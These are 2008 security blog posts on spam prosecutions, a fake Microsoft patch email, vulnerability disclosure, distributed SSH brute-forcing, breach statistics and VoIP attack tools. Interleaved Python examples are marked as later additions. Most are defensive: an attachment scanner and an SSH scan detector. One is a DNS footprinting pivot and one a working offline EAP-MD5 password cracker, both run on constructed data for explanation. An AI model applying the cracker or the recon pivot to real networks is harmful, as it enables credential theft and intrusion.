Oct 15 2008 1:49PM GMT
Posted by: Dennis Fisher
Information Security Threats,
Laws, Investigations and Ethics
The FTC on Tuesday dropped the hammer on a group of alleged spammers who are notorious in the antispam community for their persistence and prolific output. The commission persuaded a U.S. District Court to issue a temporary injunction against two members of the HerbalKing spam gang and to freeze the men’s assets. The FTC alleges that the two defendants, Lance Atkinson and Jody Smith, were responsible for sending billions of spam messages advertising the usual array of herbal remedies, male enhancement products and prescription drugs. From the commission’s announcement of the action:
The Federal Trade Commission has received more than three million complaints about spam messages connected to this operation, and estimates that it may be responsible for sending billions of illegal spam messages. At the request of the FTC, the court has issued a temporary injunction prohibiting defendants from spamming and making false product claims, and has frozen the defendants’ assets to preserve them for consumer redress pending trial. Authorities in New Zealand also have taken legal action, working in tandem with the FTC.
According to papers filed with the court, the defendants deceptively marketed a variety of products through spam messages, including a male-enhancement pill, prescription drugs and a weight-loss pill.
Spamhaus, the organization that tracks spammers and maintains a register of known spam operations, said that the HerbalKing group had been the most prolific spammers in the world for most of 2007 and 2008 and had been operating since 2005. The group also said that despite Tuesday’s court order and asset freeze, the gang’s spam activities have continued unabated in the last 24 hours, most likely because much of the operation is automated through botnets, which keep sending whether or not their operators are in court. And, Spamhaus officials said, “Spammers such as this gang and the Russians, Indians and others they work with care little about the law. Spamhaus notes that most will not quit spamming until they are behind bars.”
Oct 15 2008 10:23AM GMT
Posted by: Dennis Fisher
Microsoft Security
There is a fake Microsoft patch email making the rounds, timed nicely to coincide with yesterday’s release of the latest set of updates from the software giant. Known as Haxdoor, the malware arrives in an email designed to look like an official communication from Microsoft, albeit with some pretty obvious spelling and grammatical errors. The clearest indicator might be that the patch is allegedly for “05 Windows.” (Maybe it was targeted at Vista’s original release date.) Once a user opens the attached file (KB589770.exe), which carries a fake PGP signature, it drops a slew of files onto the machine, changes several registry keys and then establishes connections to two remote websites. Nothing good is coming from that. Worth remembering: Microsoft does not distribute security updates as email attachments, so any message that does is a fake by definition.
This malware is another step down the path blazed by the fake antivirus programs that have been polluting inboxes for the last few months. I would hope that at this point most enterprises are blocking executable attachments at the mail gateway, which would prevent a lot of the headaches these things cause. Blocking on content rather than on the file extension alone matters here, since a renamed .exe is still an .exe. But if not, there’s no time like the present to start.
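As an added example (not from the original post, and not an analysis of the actual Haxdoor sample), the following Python script shows the kind of attachment check a mail gateway should apply: it flags executable attachments by extension, by the PE “MZ” header in the content regardless of the declared MIME type or filename, and by the KB-article naming trick the lure uses. The message it scans is constructed inline; the sender address, filenames and the 64-byte PE header stub are all illustrative.

```python
import email
import os
import re
from email import policy
from email.message import EmailMessage

# Magic bytes of a Windows PE executable and extensions a mail gateway
# should treat as executable content (illustrative list, extend as needed).
PE_MAGIC = b"MZ"
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".dll",
                   ".msi", ".js", ".vbs", ".hta"}
KB_NAME = re.compile(r"^kb\d+", re.IGNORECASE)


def build_sample_message() -> bytes:
    """Constructed lure, not the real Haxdoor mail: a spoofed 'Microsoft'
    message with a fake PE attachment named like a KB article, the same PE
    bytes hidden behind an image name, and a benign text attachment."""
    msg = EmailMessage()
    msg["From"] = "Microsoft Security <update@microsoft.example>"   # spoofed, constructed
    msg["To"] = "user@corp.example"
    msg["Subject"] = "Critical Security Update for 05 Windows"
    msg.set_content("Please instal the attached patch imediately.")
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60          # PE header stub only, not runnable
    msg.add_attachment(fake_pe, maintype="application", subtype="octet-stream",
                       filename="KB589770.exe")
    msg.add_attachment(fake_pe, maintype="image", subtype="jpeg",
                       filename="patch_notes.jpg")   # renamed executable
    msg.add_attachment("Release notes.", filename="notes.txt")
    return msg.as_bytes()


def scan_message(raw: bytes) -> list[dict]:
    """Return one finding per attachment that should be blocked, with reasons."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        ext = os.path.splitext(name)[1].lower()
        reasons = []
        if ext in EXEC_EXTENSIONS:
            reasons.append("executable extension")
        if payload[:2] == PE_MAGIC:
            reasons.append("PE header in content regardless of name or MIME type")
        if KB_NAME.match(name):
            reasons.append("KB-style name: Microsoft never ships updates as attachments")
        if reasons:
            findings.append({"filename": name,
                             "content_type": part.get_content_type(),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_message(build_sample_message()):
        print(f"BLOCK {f['filename']} ({f['content_type']}): {'; '.join(f['reasons'])}")
```

The second attachment is the important one: it declares itself image/jpeg and carries a harmless-looking name, so an extension filter lets it through, while the content check catches it.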
Oct 7 2008 11:13AM GMT
Posted by: Dennis Fisher
Network Security,
Information Security Threats
The past few months have seen a lot of activity around some really serious Internet-level vulnerabilities, starting with the problems in the DNS system that Dan Kaminsky found, and continuing with the clickjacking attacks from Robert Hansen and Jeremiah Grossman, and the recent news of new DoS attacks on the TCP stack by Robert E. Lee and Jack C. Louis. Each of these problems got a lot of attention in the press and in the vendor and research communities, and rightly so. They’re all serious problems. But they all have one other thing in common: They were all the subjects of so-called partial disclosure efforts. In each case, some details of the vulnerability were released, and then the researchers involved said that the problems were too serious to discuss fully until patches, workarounds or other fixes were available.
This disclosure model — whether it’s intentional or accidental — is clearly not the optimal way to handle new vulnerabilities. Ideally, a researcher finds a bug and tells the affected vendors, who then produce patches in a timely manner, and the details come out later. Everyone lives happily ever after. But it doesn’t always work that way. Sometimes word of the bug leaks out (Kaminsky’s DNS flaw), and sometimes the researchers deliberately reveal some details of the bug for one reason or another (clickjacking and the TCP DoS attacks). Either way, the result is often that the small bits of information available drive speculation and doomsaying, which in turn bring out the people who say this bug is: A. Nothing new; B. Not as serious as it sounds; or C. Both. Sometimes that turns out to be the case. Other times, as with the DNS flaw, the problem is not only new but also extremely serious. In both cases the partial disclosure mode of operation exposes everyone involved to charges of fear-mongering and publicity seeking.
Now, Kaminsky is trying to halt this nascent trend by setting up a tribunal of trusted security experts – such as himself — to whom researchers can show details of bugs that they consider to be potential Internet-killers under the cover of a non-disclosure agreement. What they’ll do with the details and how they’ll disclose them if they deem the bug to be an Internet-killer isn’t clear. Here’s what Kaminsky says about his idea:
Members of this council will have to have publicly presented work in the subject area that is under consideration. I’ve spoken to a decent number of people, and everyone is somewhere between very pissed and legitimately afraid of a flood of unjustified partial disclosures.
Faced with an unending stream of “is the Internet dead yet?” Slashdot posts, everyone I’ve spoken to appears fully on board with providing an honest judgement regarding the legitimacy of findings.
Now, I expect we will reject, out of hand, almost all claims. But we will do so, with the full technical argument brought by the finder, rather than presumptions based on old flaws. Attacking the strawmen implied by partial disclosure is a losing scenario for literally everyone involved.
This is an interesting idea, especially given that it comes from Kaminsky himself, who has fallen on his sword repeatedly in the last few months for talking publicly about the DNS bug without having had anyone else in the security community review the details. (He eventually did give the details to Tom Ptacek and Dino Dai Zovi, who vouched for the seriousness of the vulnerability.) Dan’s rationale is mostly sound. He says that unless some kind of independent authority is set up to verify the claims of researchers who say they’ve found killer bugs, inevitably someone will game the system and simply do the following: claim to have a monster flaw, dole out a few juicy details to the press, then sit back while admins panic and rush off to buy security gear from the researcher’s company to fix the imaginary (or semi-real) problem.
Dan is exactly right in saying this scenario is a very real possibility. I’ve been writing about security for about eight years and I know a lot of the researchers and industry executives and other players well. I understand the technology pretty well, but I’m not an engineer or a computer scientist, so I rely on the people I talk to for explanations and context. So it’s certainly not out of the realm of possibility that a researcher could take me or any other reporter for a ride with a description of a fictional bug or attack. That’s why I check these stories with experts I know and trust. That’s the best defense.
But there’s another factor in play that I think cuts against what Dan is worried about, and that’s the fact that any researcher pulling that kind of stunt has far more to lose than to gain. Let’s use Dan as an example. He has spent a lot of years building up his reputation in the security community, and people tend to take what he has to say on certain issues seriously. So if he used that credibility to hype some bug that turned out to be insignificant or even imaginary, any short-term gain from the publicity would be completely wiped out by the resulting backlash. For someone who is always in the news anyway, the way that Dan is, there’s no percentage in that play. And even for an unknown researcher looking to make a name for himself, the negatives far outweigh the positives in that equation.
I agree with Dan’s premise that partial disclosure is counterproductive in most cases, but I’m not sold on the idea of a Justice League of the Internet parceling out information as it sees fit. One of the reasons why things work relatively well right now is that the specter of public embarrassment for falsely hyping a bug looms large. And that’s not likely to change anytime soon.
Oct 6 2008 11:03AM GMT
Posted by: Dennis Fisher
Security Vendor News
Things in the security industry are getting curiouser and curiouser. Up is down. Black is white. Cats and dogs are living together. Mike Rothman, a ferociously independent security analyst and blogger at Security Incite, is making the leap back into the vendor world as senior vice president of strategy and chief marketing officer at eIQnetworks, a provider of a security management platform for compliance. Rothman has spent the last few years variously doing research and speaking plainly about security vendors. Before that, he spent his share of time in the vendor community, at SHYM, CipherTrust and TruSecure. As for why he decided to jump back into the fire, here’s what Rothman says:
No, I wasn’t expecting this. No, I wasn’t looking for a job. No, I didn’t “need” to. Yes, I’m probably nuts for taking another vendor job. But a number of pretty cool things came together and compelled me to make this move.
I should always remember that “never” is a very long time. Given my short attention span, the idea of “never” doing anything again is pretty silly.
What exactly Rothman will be doing as a CMO is unclear, but the one thing you can count on is that he’ll say what he thinks. And it will probably be entertaining.
Oct 3 2008 4:02PM GMT
Posted by: Dennis Fisher
Information Security Threats
It appears that SSH attacks are becoming the go-to move for lazy attackers looking to victimize lazy admins. A couple of weeks ago I wrote about some ongoing brute-force attacks against SSH implementations, and now it seems that attackers are moving on to some new tactics. The Internet Storm Center has gotten a couple of reports of SSH attacks in which the attacking machines are guessing usernames and passwords at a rate of only about 20 attempts per hour, spread across many source addresses. The key here is that the number of attempts from any one address falls below the threshold of the scripts usually used to detect these attempts and ban the attacking IP addresses.
Usernames are being brute forced starting at “aaa” and incremented. This is being done in a distributed manner with almost perfect synchronization between the scanning hosts. Over the last 32 hours, his system received 216 login attempts of which 138 attempts were from unique IP addresses. Obviously, the attacker is trying to avoid the popular SSH banning scripts by going under the banning thresholds of these programs. At peak, there were only 20 total attempts per hour. Note that the username guessing did not actually cover all possibilities. Perhaps it is a bug, or by design. The last letter was not being exhaustively tested — only about 10 of 26 letters were being tested in the last position, and it seemed to be randomly picked.
The widespread problems that have plagued SSH in the last few months are making it an attractive target for attackers just looking to rattle doorknobs and see which ones pop open. The lesson of this report is that a per-IP ban threshold is not a detection strategy: a distributed, slow scan sails under it by design, and only aggregate signals (total failed logins across all sources, or the telltale sequential usernames) will show it. If you haven’t already, now would be a good time to check your SSH server, make sure there is no account with a name like “aaa” and a guessable password, and, better yet, turn off password authentication (PasswordAuthentication no in sshd_config) in favor of keys.
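To make the detection point concrete, here is an added example (my code, not something from the ISC report or the original post) that runs over a constructed auth.log. The sample reproduces the pattern described above, one guess every three minutes with usernames incremented from “aaa” and each guess coming from a different address in 203.0.113.0/24, and compares a fail2ban-style per-IP threshold with two aggregate signals: total invalid-user attempts per hour across all sources, and the fraction of consecutive attempts whose usernames sort upward. The thresholds (5 per IP, 15 per hour, 80% monotonic) are assumptions for illustration.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Matches the sshd line logged for a nonexistent account (syslog format,
# no year). Failed-password lines for real accounts would need a second pattern.
INVALID_USER = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Invalid user (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)
LOG_YEAR = 2008  # syslog omits the year; supply it when parsing


def next_username(name: str) -> str:
    """'aaa' -> 'aab', 'aaz' -> 'aba': the increment the scan walks."""
    chars = list(name)
    for i in range(len(chars) - 1, -1, -1):
        if chars[i] != "z":
            chars[i] = chr(ord(chars[i]) + 1)
            return "".join(chars)
        chars[i] = "a"
    return "a" + "".join(chars)


def build_sample_log(attempts: int = 60, sources: int = 30) -> list[str]:
    """Constructed auth.log: one guess every three minutes (20/hour),
    usernames incremented from 'aaa', each guess from a different source
    in 203.0.113.0/24 so no single IP repeats often."""
    lines, user = [], "aaa"
    start = datetime(LOG_YEAR, 10, 3, 10, 0, 0)
    for k in range(attempts):
        ts = start + timedelta(minutes=3 * k)
        ip = f"203.0.113.{k % sources + 1}"
        lines.append(f"Oct {ts.day:2d} {ts:%H:%M:%S} bastion sshd[{4000 + k}]: "
                     f"Invalid user {user} from {ip}")
        user = next_username(user)
    return lines


def analyze(lines, per_ip_maxretry=5, hourly_total_threshold=15, monotonic_min=0.8):
    """Compare a per-IP ban threshold (what fail2ban-style scripts use)
    with aggregate signals: total failures per hour across all sources,
    and the fraction of consecutive guesses whose usernames sort upward."""
    events = []
    for line in lines:
        m = INVALID_USER.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append((ts.replace(year=LOG_YEAR), m["user"], m["ip"]))
    events.sort()
    per_ip = Counter(ip for _, _, ip in events)
    per_hour = Counter(ts.replace(minute=0, second=0) for ts, _, _ in events)
    upward = sum(1 for a, b in zip(events, events[1:]) if b[1] > a[1])
    monotonic_fraction = upward / max(len(events) - 1, 1)
    return {
        "events": len(events),
        "unique_sources": len(per_ip),
        "max_per_ip": max(per_ip.values(), default=0),
        "per_ip_ban_fires": any(c >= per_ip_maxretry for c in per_ip.values()),
        "peak_per_hour": max(per_hour.values(), default=0),
        "aggregate_alert": any(c >= hourly_total_threshold for c in per_hour.values()),
        "monotonic_fraction": monotonic_fraction,
        "sequential_scan_alert": monotonic_fraction >= monotonic_min,
    }


if __name__ == "__main__":
    for key, value in analyze(build_sample_log()).items():
        print(f"{key:>22}: {value}")
```

On the constructed log no address exceeds two attempts, so the per-IP ban never fires, while the hourly total (20) and the perfectly ascending usernames both trip the aggregate checks. The monotonic test is deliberately loose (it only asks that each name sort after the previous one) because, as the ISC handler noted, the scan skipped letters in the last position.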
Oct 2 2008 3:00PM GMT
Posted by: Dennis Fisher
Data Breaches and Identity Theft
Anytime there is a notification of another data breach — which is essentially every day at this point — the details of the event tend to get washed away, and the breach is reduced to basically two pieces of information: the name of the victimized company and the number of records it lost. This leads to an assumption that all of these incidents are created equal, which is demonstrably not the case. Verizon Business on Thursday released a supplement to its June Data Breach Investigations Report, which shows that of all the breaches the company’s security response team worked on from 2004 through 2007, the majority (62%) had errors as a direct cause or significant contributing factor, rather than malware or direct attacks.
The Verizon Business Supplemental Report, which breaks the incidents down by industry, found that errors were by far the largest contributing factor in breaches in the technology industry, contributing to 67% of breaches. By contrast, hacking contributed to only 45% of incidents in the tech sector. “It could rightly be said that some form of error occurs somewhere in the chain of events surrounding nearly all data breaches. While this is true, our investigators focus on errors that directly cause or significantly contribute to the incident,” the report says. With that in mind, the report shows that errors of omission are by far the largest problem, contributing to 80% of breaches across all industries.
The data in the report is fascinating and, aside from the causes of the breaches, there is plenty of fodder for further investigation. The other thing that jumped out at me is that in many of the incidents that had attacks as a contributing factor, the Verizon team found that the attack took some significant skill to execute. Across all industries, 45% of these incidents were rated either moderate or high in terms of difficulty. In the tech industry, 69% of the attacks took moderate or high skills.
I have to say that surprises me more than a little bit. Most of the experts I’ve talked to about specific incidents that they’ve been involved with have said that the attack involved was usually a low-level one, like the Wi-Fi sniffing attack that was used in the TJX breach. What this tells me, among other things, is that there is a whole lot we don’t know about these breaches, especially with regard to how they’re going down and why. More information, please.
Sep 29 2008 4:42PM GMT
Posted by: Dennis Fisher
Network Security,
Application Security
When the subject of penetration testing and security assessments comes up, it usually conjures thoughts of highly skilled consultants deploying an array of custom tools to gather information on a target network and look for potential weak spots. But there are a number of guys out there doing these assessments who are using less-technical methods and putting the Web’s seemingly boundless stores of information to use instead. Chris Gates is one of those guys, and he gave a fascinating talk on his methods at ToorCon over the weekend, telling the audience that tools like Maltego and Metagoofil can be invaluable in gathering data on a target network.
Maltego, which finds, organizes and displays information on specific networks and reveals the relationships among companies and individual people, can be a tremendous resource, he said. “I can start with mail servers and name servers and get all the domains on those servers and then move onto netblocks,” he said.
Gates also said that tools such as email address harvesters can be great sources of information on a company’s employees, as can social networking sites such as LinkedIn, Facebook and MySpace. That’s not a huge revelation, but using information gathered on those sites in conjunction with the other tools Gates talked about can lead to major caches of data on specific employees or companies in general, all of which can then be leveraged to glean more information. The point of the talk was that none of this requires touching the target’s network; every pivot is against public records.
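As an added illustration of the pivot Gates described (mail servers and name servers, then domains, then netblocks), here is a small Python script of my own, not Gates’s tooling and not Maltego. It works entirely offline over constructed, fictional DNS data (RFC 2606 names, RFC 5737 addresses) standing in for what a passive-DNS source or zone data would return: invert the MX and NS records to find every domain pointing at a seed server, collect the A records under those domains, and collapse the addresses into /24 netblocks. The `/24` aggregation is an assumption; real netblock attribution would come from WHOIS or routing data.

```python
import ipaddress
from collections import defaultdict

# Constructed, fictional DNS data; in practice these come from passive DNS,
# search engines, zone data or the target's own name servers.
MX_RECORDS = {
    "example.com": ["mail.example.com"],
    "example.net": ["mail.example.com"],
    "example-shop.com": ["mail.example.com"],
    "example.org": ["mx.example.org"],              # unrelated organisation
}
NS_RECORDS = {
    "example.com": ["ns1.example.com", "ns2.example.com"],
    "example.net": ["ns1.example.com", "ns2.example.com"],
    "example-shop.com": ["ns1.bighoster.example"],  # outsourced DNS
    "example.org": ["ns1.bighoster.example"],       # same shared hoster
}
A_RECORDS = {
    "mail.example.com": "192.0.2.10",
    "ns1.example.com": "192.0.2.2",
    "ns2.example.com": "192.0.2.3",
    "www.example.com": "192.0.2.20",
    "vpn.example.com": "192.0.2.21",
    "www.example.net": "192.0.2.30",
    "www.example-shop.com": "203.0.113.7",
    "mx.example.org": "198.51.100.5",
    "www.example.org": "198.51.100.6",
}


def invert(records: dict[str, list[str]]) -> dict[str, set[str]]:
    """server -> domains that point at it (the reverse-lookup transform)."""
    out = defaultdict(set)
    for domain, servers in records.items():
        for server in servers:
            out[server].add(domain)
    return out


def domains_served_by(server: str) -> set[str]:
    """Domains that use `server` as a mail exchanger or name server."""
    return invert(MX_RECORDS).get(server, set()) | invert(NS_RECORDS).get(server, set())


def hosts_in(domains: set[str]) -> dict[str, str]:
    """Every A record whose name is one of the domains or lies under one."""
    return {name: addr for name, addr in A_RECORDS.items()
            if any(name == d or name.endswith("." + d) for d in domains)}


def netblocks(addresses, prefix: int = 24) -> set[str]:
    """Collapse addresses to their containing /prefix networks."""
    return {str(ipaddress.ip_network(f"{a}/{prefix}", strict=False)) for a in addresses}


def footprint(seed_server: str) -> dict:
    """Seed server -> domains -> hosts -> netblocks, the chain Gates described."""
    domains = domains_served_by(seed_server)
    hosts = hosts_in(domains)
    return {"seed": seed_server, "domains": domains, "hosts": hosts,
            "netblocks": netblocks(hosts.values())}


if __name__ == "__main__":
    for seed in ("mail.example.com", "ns1.bighoster.example"):
        fp = footprint(seed)
        print(seed, "->", sorted(fp["domains"]), "->", sorted(fp["netblocks"]))
```

Seeding from the company’s own mail server ties three domains and two netblocks together. Seeding from a shared hosting provider’s name server is the caveat: it drags in an unrelated organisation, so pivots through infrastructure the target does not control need to be verified before they go into a report.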
Also, be sure to check out the photos of ToorCon I took this weekend.
Sep 28 2008 2:43PM GMT
Posted by: Dennis Fisher
Security,
Network Security,
Information Security Threats
After years of hype and mostly unfulfilled promise, VoIP has begun making some headway in large enterprises. A lot of IT managers are attracted by the technology’s potential to help them save money through lower phone bills and converged services. And don’t think that the attackers haven’t noticed VoIP’s emergence. At the ToorCon conference in San Diego this weekend, Jason Ostrom, a security researcher with Sipera VIPER Lab, gave a talk that featured several tools he’s built, including VoIP Hopper, that can be used to test the security of VoIP deployments and look for potential attack vectors.
Ostrom talked about a new tool he’s developed, called UCSniff, that enables a user to monitor VoIP traffic on a network in several different ways. The most interesting and potentially useful function of UCSniff is its ability to sniff all of the conversations on a particular extension. It also can be set to passively monitor all of the VoIP traffic on a network and learn the interactions among devices, discovering which extensions belong to whom. Then, once that mapping is accomplished, the user can identify which devices he’s interested in monitoring and target those specifically.
Ostrom said he plans to port UCSniff to Windows in the near future and that it will also soon include support for the H.323 standard. Much of the threat to VoIP networks at this point has come from various denial-of-service attacks, but security experts for years have been warning that the nature of IP phones and the ways in which VoIP networks are set up could make them susceptible to traffic-sniffing attacks like the ones that Ostrom described.
Ostrom and some of his coworkers also have developed a third tool, called XTest, which can test VoIP infrastructures for security problems. XTest is designed specifically to audit wired 802.1X implementations, and can check the strength of the passwords used in these implementations through an offline EAP-MD5 dictionary attack, running a wordlist against captured challenge/response pairs. That attack works because EAP-MD5 is a plain challenge/response method: it offers no mutual authentication and derives no session keys, so anyone who can sniff the exchange on the wire can recover a weak password at leisure, which is why it is generally considered unsuitable for 802.1X.
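To show what an offline EAP-MD5 dictionary attack actually computes, here is an added Python example of my own; it is not XTest and not code from Sipera. It builds a constructed EAP MD5-Challenge request and response as a sniffer would see them (EAPOL framing omitted, fixed challenge, made-up identities and wordlist), then recovers the password by recomputing MD5(Identifier || password || Challenge) per RFC 3748 and RFC 1994 for each candidate and comparing it with the observed response value.

```python
import hashlib
import struct
from typing import Optional

EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_MD5_CHALLENGE = 4


def eap_md5_response_value(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """RFC 3748 sec. 5.4 / RFC 1994: MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def build_eap_md5(code: int, identifier: int, value: bytes, name: bytes = b"") -> bytes:
    """EAP packet: Code, Identifier, Length, Type=4, Value-Size, Value, Name."""
    body = bytes([EAP_TYPE_MD5_CHALLENGE, len(value)]) + value + name
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap_md5(packet: bytes) -> tuple[int, int, bytes, bytes]:
    """Return (code, identifier, value, name) or raise on a malformed packet."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet) or packet[4] != EAP_TYPE_MD5_CHALLENGE:
        raise ValueError("not an EAP MD5-Challenge packet")
    size = packet[5]
    return code, identifier, packet[6:6 + size], packet[6 + size:]


def simulate_capture(password: bytes, identifier: int = 0x2A) -> tuple[bytes, bytes]:
    """Constructed authenticator/supplicant exchange standing in for a sniffed one.
    The challenge is a fixed constructed value; a real one is random per attempt."""
    challenge = bytes.fromhex("00112233445566778899aabbccddeeff")
    request = build_eap_md5(EAP_REQUEST, identifier, challenge, b"switch-01")
    response = build_eap_md5(EAP_RESPONSE, identifier,
                             eap_md5_response_value(identifier, password, challenge),
                             b"ipphone-sep001122")
    return request, response


def crack_eap_md5(request: bytes, response: bytes, wordlist) -> Optional[str]:
    """Offline dictionary attack: recompute the response for each candidate."""
    req_code, req_id, challenge, _ = parse_eap_md5(request)
    resp_code, resp_id, observed, _ = parse_eap_md5(response)
    if (req_code, resp_code) != (EAP_REQUEST, EAP_RESPONSE) or req_id != resp_id:
        raise ValueError("request and response do not pair up")
    for candidate in wordlist:
        if eap_md5_response_value(req_id, candidate.encode(), challenge) == observed:
            return candidate
    return None


WORDLIST = ["password", "cisco", "voip123", "Summer2008", "phone"]  # constructed

if __name__ == "__main__":
    req, resp = simulate_capture(b"Summer2008")
    print(crack_eap_md5(req, resp, WORDLIST))
```

The cost of the attack is one MD5 per candidate, with nothing rate-limiting it, so the only defense a password offers is its entropy; the structural fix is an EAP method with server authentication and key derivation (EAP-TLS or a tunneled method) rather than a longer EAP-MD5 password.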
Sep 24 2008 10:15AM GMT
Posted by: Dennis Fisher
Application Security
Mozilla has released new versions of both Firefox 3 and Firefox 2 that fix a slew of security vulnerabilities, including at least one critical remote code-execution flaw. Firefox 3.0.2 fixes a weakness in the latest version of the browser that enables an attacker to run code of his choice on a vulnerable machine and even install rogue software. There are also several less severe vulnerabilities addressed in version 3.0.2.
Mozilla also released an updated version of Firefox 2, the older version of the browser that many people still use. Firefox 2.0.0.17 includes fixes for several serious code-execution vulnerabilities, as well as some less-serious flaws.